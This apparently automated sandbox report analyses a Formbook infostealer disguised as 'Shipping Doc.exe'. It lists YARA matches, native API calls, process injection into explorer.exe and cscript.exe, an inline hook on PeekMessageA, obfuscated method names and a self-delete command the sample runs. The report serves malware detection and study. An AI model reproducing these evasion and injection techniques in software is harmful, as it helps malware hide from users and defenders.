          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00419D5B NtCreateFile,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00419E8B NtClose,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E10 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E90 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E8B NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219D5B NtCreateFile,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00417164
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041E1B3
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041DAB4
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041D360
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00409E40
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05461D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05390D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AD5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AB090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B6E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321DAB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03217164
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321E1B3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03202FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03209E40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03202D87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03202D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0539B150 appears 32 times
          Source: Shipping Doc.exe, 00000002.00000000.210709159.00000000004B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.320202534.0000000000F90000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.320852896.0000000001C0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Doc.exe
          Source: Shipping Doc.exeBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\Shipping Doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: Shipping Doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Shipping Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Shipping Doc.exeVirustotal: Detection: 50%
          Source: Shipping Doc.exeMetadefender: Detection: 31%
          Source: Shipping Doc.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\Shipping Doc.exe 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Users\user\Desktop\Shipping Doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Shipping Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Shipping Doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: Shipping Doc.exeStatic PE information: 0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00414A19 push ebp; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_004046A7 push edx; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_004167BF push ecx; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03214A19 push ebp; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF02 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF0B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF6C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_032167BF push ecx; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03214F99 pushfd ; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_032046A7 push edx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CEB5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.2014231354
          Source: Shipping Doc.exe, jtOONAqGyrOQ0u8Ixk/bpT4mwco1CD693b7CN.csHigh entropy of concatenated method names: '.cctor', '.ctor', '.ctor', 'oPOobRO5Vf', 'xm0o4Sf5NR', 'iEhoUBHjQn', 'ijuoVsDDg2', 'MQ3opPNGI1', 'S3PoaRe2Zm', 'nWyo9cofXu'
          Source: Shipping Doc.exe, RuGDW7WIWRL3vuqXmw/WrIPZ8OGPrQJVhLUng.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'rgxUTfEcE8', 'q8OZlL4Rke', 'x5iZK8bkZ8', 'G2oZhTFUiy', 'L68ZzSd862', 'V2KO3o6ooX', 'cAnOXHn0FW', 'wSEOMWMK2K'
          Source: Shipping Doc.exe, hasvvCPjjpwAYaryty/EfFkrBZD9T3RSksP6r.csHigh entropy of concatenated method names: 'Rj7pMjk0RG', 'yxxppukx53', '.ctor', 'uJxMm4pXjR', 'k9lMjtoI45', 'wSjM2XIjCC', 'gO5MrDyTRD', 'KrXMRRV4g5', 'uydM6uLlM6', 'YGpMTXkEhk'
          Source: Shipping Doc.exe, QSqf1GDneX5foweMTs/gdXQIRHg06sMXH3Uxd.csHigh entropy of concatenated method names: '.ctor', 'OFPUt83v9K', 'Dispose', 'mCOUJCTXYL', 'upBUseu0pH', 'HIXUhn1Ejd', 'I30U81QHfg', 'StGUGWc16P', 'X1iUOqmHqd', 'Ka0ZQEPwNI'
          Source: Shipping Doc.exe, VfaCLA2tkrd397ihoB/buZV27SgYVJ8wKY7Z0.csHigh entropy of concatenated method names: 'CMppZjWBMw', 'WSepPM9SAb', 'BJApjvbu0I', 'ReYpSqXGYT', 'hp3prsATrN', 'N3op30XIBP', 'YUZpyoUrkn', 'EV6p6ZDRrC', 'S0OpzLwnNq', 'uvNabGVwIQ'
          Source: Shipping Doc.exe, UNAPpRk5a6XMif56PN/tbtYLjiE15X0m3NrV3.csHigh entropy of concatenated method names: 'DownJlYGxJ', 'xuxnPXJrTV', 'w3mnbXLFql', 'fTqnDGgSIY', 'eINnmEc12d', 'nKXnd3ROy7', 'awc4e3Q42f', 'BhB4klsGCM', 'g6x4c5BQkZ', '.ctor'
          Source: Shipping Doc.exe, UiJUy4BuRoHLOAKf06/xXY9csuTjhbcI1BP2L.csHigh entropy of concatenated method names: '.ctor', 'Save', 'HAK5f06my', 'Load', 'HD3dcOlu8', 'L3tKrC2Wr', 'IdyxYvcVc', 'UiJGtlVLwBaQxjgBF6', 'PIkx4Wf1QZgiV6aU4i', 'Dmh9sciVAETbBXxfFa'
          Source: Shipping Doc.exe, UOdyYvecVcmermsDhZ/RyGD3cgOlu803trC2W.csHigh entropy of concatenated method names: '.ctor', 'RHvjJZq4E', 'p2nSuK03D', 'vRg006sMX', 'za8rj6Xgs', 'lcY3ZFXvZ', 'SuJyVgV3w', 'K5l6Xpqre', 'aboznP1OR', 'wKa4b4MTS2'
          Source: Shipping Doc.exe, lfBAw24wG7RaGl4BUSW/LdIBF34ft0aEOrSOpS7.csHigh entropy of concatenated method names: 'Dispose', 'ab0nKv0rYl', 'QfAnxS7FmM', 'KPJntrwakq', 'hrtnJqte2T', 'get_MinimumSize', 'set_MinimumSize', 'zaruECCxke', 'AUkuQwTOtd', 'kmkuL8FL2C'
          Source: Shipping Doc.exe, xP7XZx4KUcy0rZpMq7p/C89e434dqTXWooX6OT2.csHigh entropy of concatenated method names: 'e0riOZyeQf', 'PdXiWMlD76', '.ctor', 'get_BackColor', 'set_BackColor', 'get_BackgroundImage', 'set_BackgroundImage', 'get_BackgroundImageLayout', 'set_BackgroundImageLayout', 'get_Font'
          Source: Shipping Doc.exe, wUV9j84txMqsOMB0RNC/O8br1u4x3ZTxpBM3GKp.csHigh entropy of concatenated method names: '.ctor', 'MStqzWqX98', 'Bbn63OwGFH', 'BinijXg983', 'zWEiSMBU7I', 'GetEditControl', 'GetEditedValue', 'LoadValues', 'SetEditStyle', 'GetEditStyle'
          Source: Shipping Doc.exe, m90oD71ZT6Wr9cSLC3/BCGZxMFmXU9h9JKBRA.csHigh entropy of concatenated method names: '.ctor', 'd4MMkZMC3a', 'jwDMcNsXnd', 'Gp5MqvWKfg', 'SyIMHvh4nd', 'hUNMDI3IfP', 'mDWuCAUyBYn6ulPCLkn', 'glMALsU9egpF9gq6VvY', 'BPhg4AU0cm0xPgAcOUP', 'A1LpkmUKxjoeRJhgj5v'
          Source: Shipping Doc.exe, sKgaUY4su4YTKa6GuYl/zgNK5N4JjGAZFgAu99M.csHigh entropy of concatenated method names: '.ctor', 'UbQkbXvRlm', 'IODk4e1Qh2', 'csBkUTL3tc', 'khokVDYHrG', 'Gl8i6EIG8s', 'qyCiTn1nPR', 'FE7iz1aZDQ', 'gcBwMrofCMqEqIdiR6L', 'i3QNTaoieNlxFPGbQ4d'
          Source: Shipping Doc.exe, I156H44Dv8rnIOySGfK/hltbY94HHwR3afLhEhf.csHigh entropy of concatenated method names: '.ctor', 'aLPlf5n4CH', 'tIqlwf7H6m', 'tZJlo0KBRb', 'cpflU40tFN', 'wk5lV1CuJF', 'kyhlMnlNeC', 'xLolpUglD3', 'N0WlaMcuXO', 'XbElCFHsrk'
          Source: Shipping Doc.exe, iTAtM84qSuFr2hs51c1/llm9gs4ch4IcMcmGnvJ.csHigh entropy of concatenated method names: 'FIv9ZZdDqG', 'gQI9PDLDlN', 'q2H9mKTBvh', 'uM89jAIc2y', 'zL49SlfPPi', 'get_Multiline', 'set_Multiline', 'get_Text', 'set_Text', '.ctor'
          Source: Shipping Doc.exe, aiLmWw4VnJDnSPTNJVN/XYryxx4U6BmknteXNOa.csHigh entropy of concatenated method names: '.ctor', 'ukj9woe4c6', 'Dfu9EiQsTa', 'NuW9A6sETI', 'InitializeEditingControl', 'get_EditType', 'get_ValueType', 'get_DefaultNewRowValue', 'MmH4btFKnt5dqxSDm2G', 'hZ9OUfFVGF3Eyyj8DxB'
          Source: Shipping Doc.exe, BLop0K4E7l9d1bylJUy/zJBh6F4IacA7iyEpXZO.csHigh entropy of concatenated method names: 'L5eBi4Qigv', 'ixEBkeoTbq', 'FFgBo4KGaE', 'BSVBUenW6x', 'agMBMj6JFC', 'G76Bp97jPo', 'NEABaXP8gi', 'mb7BCbn9q3', 'oorB9rEwKt', 'zx5BYqnub6'
          Source: Shipping Doc.exe, vNeJVt4AWwbHEvjgGer/LdlLQ14Qf610ZIAPrJw.csHigh entropy of concatenated method names: '.ctor', 'QppedwFCcs', 'qd6eKe7iLK', 'GI4etXfotQ', 'wxEeJ5n5Hk', 'get_Multiline', 'set_Multiline', 'fOLB0NPOGK', 'okIBFsEdfE', 'A7HB1qoYTX'
          Source: Shipping Doc.exe, nKYoUB4oxKLGj4jvd63/aLgWyc44ofXur00lLx1.csHigh entropy of concatenated method names: 'VsAaQxSlAF', 'D09aAvsZj4', 'LmhaLRSl8M', 'okva5IYOyq', 'HKUad6KvCc', 'CAuaKRAFBD', 'J6paxwfEfU', 'iLlatruy0f', 'YF3aJVd6Ly', 'dX9aspur2U'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE3
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

